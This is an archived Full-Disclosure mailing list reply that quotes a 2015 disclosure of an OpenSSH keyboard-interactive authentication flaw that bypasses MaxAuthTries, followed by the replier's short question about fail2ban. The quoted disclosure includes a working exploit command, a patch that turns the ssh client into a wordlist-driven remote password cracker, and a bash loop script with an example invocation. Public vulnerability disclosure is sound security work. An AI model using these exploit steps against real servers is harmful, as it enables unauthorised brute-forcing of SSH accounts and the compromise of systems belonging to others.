lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <55A9BA00.2020808@roosoft.ltd.uk> Date: Sat, 18 Jul 2015 03:29:20 +0100 From: devel@...soft.ltd.uk To: fulldisclosure@...lists.org Subject: Re: [FD] OpenSSH keyboard-interactive authentication brute force vulnerability (MaxAuthTries bypass) On 17/07/15 10:04, king cope wrote: > OpenSSH has a default value of six authentication tries before it will > close the connection (the ssh client allows only three password > entries per default). > > With this vulnerability an attacker is able to request as many > password prompts limited by the “login graced time” setting, that is > set to two minutes by default. > > Especially FreeBSD systems are affected by the vulnerability because > they have keyboard-interactive authentication enabled by default. > > A simple way to exploit the bug is to execute this command: > > ssh -lusername -oKbdInteractiveDevices=`perl -e 'print "pam," x > 10000'` targethost > > This will effectively allow up to 10000 password entries limited by > the login grace time setting. > > The crucial part is that if the attacker requests 10000 > keyboard-interactive devices openssh will gracefully execute the > request and will be inside a loop to accept passwords until the > specified devices are exceeded. > > Here is a patch for openssh-6.9p1 that will allow to use a wordlist > and any passwords piped to the ssh process to be used in order to > crack passwords remotely. > > ---snip--- > > diff openssh-6.9p1/sshconnect2.c openssh-6.9p1-modified/sshconnect2.c > 83a84,85 > > char password[1024]; > > > 510c512,517 > < authctxt->success = 1; /* break out */ > --- > > printf("==============================================\n"); > > printf("*** SUCCESS **********************************\n"); > > printf("*** PASSWORD: %s\n", password); > > printf("==============================================\n"); > > exit(0); > > > 1376a1384,1385 > > char *devicebuffer; > > int i; > 1386a1396,1405 > > devicebuffer = calloc(1, 200000); > > if (!devicebuffer) { > > fatal("cannot allocate devicebuffer"); > > } > > > > for (i=0;i<200000-2;i+=2) { > > memcpy(devicebuffer + i, "p,", 2); > > } > > devicebuffer[200000] = 0; > > > 1393,1394c1412 > < packet_put_cstring(options.kbd_interactive_devices ? > < options.kbd_interactive_devices : ""); > --- > > packet_put_cstring(devicebuffer); > 1408c1426 > < char *name, *inst, *lang, *prompt, *response; > --- > > char *name, *inst, *lang, *prompt; > 1410c1428 > < int echo = 0; > --- > > char *pos; > 1425a1444 > > > 1430a1450 > > > 1443,1449c1463,1469 > < echo = packet_get_char(); > < > < response = read_passphrase(prompt, echo ? RP_ECHO : 0); > < > < packet_put_cstring(response); > < explicit_bzero(response, strlen(response)); > < free(response); > --- > > packet_get_char(); > > if (fgets(password, 1024, stdin) == NULL) > > exit(0); > > if ((pos=strchr(password, '\n')) != NULL) > > *pos = ''; > > printf("%s\n", password); > > packet_put_cstring(password); > > ---snip--- > > After applying the patch you can use this shell script to make the > password attack from a wordlist: > > ---snip--- > > #!/bin/bash > # run as: > # cat wordlist.txt | ./sshcracker.sh ssh-username ssh-target > # > while true > do > ./ssh -l$1 $2 > rc=$?; if [[ $rc == 0 ]]; then exit $rc; fi > echo Respawn due to login grace time... > done > > ---snip--- > > For example enter this command: > > cat wordlist.txt | ./sshcracker.sh test 192.168.2.173 > > The attack has been tested against a new FreeBSD 10.1 system and older > FreeBSD versions such as version 6.2. > > _______________________________________________ > Sent through the Full Disclosure mailing list > https://nmap.org/mailman/listinfo/fulldisclosure > Web Archives & RSS: http://seclists.org/fulldisclosure/ Do you know if this is still affected if you have fail2ban in place. Fail2ban uses the auth logs to monitor failed password attempts. I assume that the auth log is still updated even if x number of attempts is allowed. Thanks -- == Don Alexander It's a tough job, but some mug has to do it... _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists